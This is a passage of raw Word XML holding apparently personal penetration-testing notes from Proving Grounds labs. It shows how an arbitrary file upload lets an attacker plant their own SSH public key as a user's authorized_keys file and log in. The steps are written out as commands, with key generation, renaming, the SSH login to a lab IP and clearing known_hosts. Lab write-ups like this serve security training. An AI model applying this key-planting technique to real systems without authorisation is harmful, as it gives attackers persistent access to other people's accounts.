      </w:r>
      <w:hyperlink r:id="rId254">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SkillForce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG practice since we can overwrite any file so we used it to get foothold using SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C5E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C5F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you can upload files into the .ssh directory (ex. /home/alfredo/.ssh), then you can upload your own public SSH key as the file "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">". </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C60">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C61">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This overwrites or creates the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, essentially telling the system: "Allow logins from anyone with the private key corresponding to this public key."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C62">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C63">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now you can SSH using your private key, and then you can now SSH into that user's account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C64">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C65">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C66">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C67">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's create a brand new SSH key pair with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh-keygen</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C68">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C69">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh-keygen -f id_rsa -t rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="345"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-f id_rsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" specifies the name of the files. So they will be "id_rsa.pub" and "id_rsa"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="345"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t rsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" makes them in rsa format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="345"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make empty passphrase</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C6D">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C6E">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C6F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now you should have a public and private key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1499"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_rsa.pub (public)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C71">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1499"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_rsa (private)</w:t>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t xml:space="preserve">And then upload the public key (ending in .pub) into the target user's .ssh directory as "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="272"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mv id_rsa.pub authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="272"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rename it to remove the .pub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="272"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload it</w:t>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t xml:space="preserve">Now add correct permissions to the private key in your kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1065"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 600 id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C7C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C7D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now login via SSH and the private key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C7E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="977"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -i authorized_keys alfredo@192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C7F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="977"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They ran this command in the same directory where the keys are, but if the keys aren't in the working directory, then you just need to specify the file path to the private key (id_alfredo is the name of the private key file)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="977"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If that doesn't work, you might need to remove your known_hosts to clear your history as shown in "Overwriting authorized_keys file using file upload" section which is from XXXXXXXXX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="977"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rm ~/.ssh/known_hosts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C82">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C83">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6p6e3saqpbq9" w:id="108"/>
      <w:bookmarkEnd w:id="108"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C84">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C85">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Regular Users: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Located in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~/.ssh/authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C86">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Root:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Located in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/root/.ssh/authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C87">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C88">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Permissions should be 600 for files in authorized_keys and the .ssh directory itself should be 700</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C89">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C8A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="927100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="452" name="image451.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image451.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId255"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="927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C8B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1413"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MoneyBox </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C8C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C8D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Format:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C8E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh-rsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → The key type (RSA in this case).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AAAAB3NzaC1... </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ The actual base64-encoded public key data.</w:t>
      </w:r>
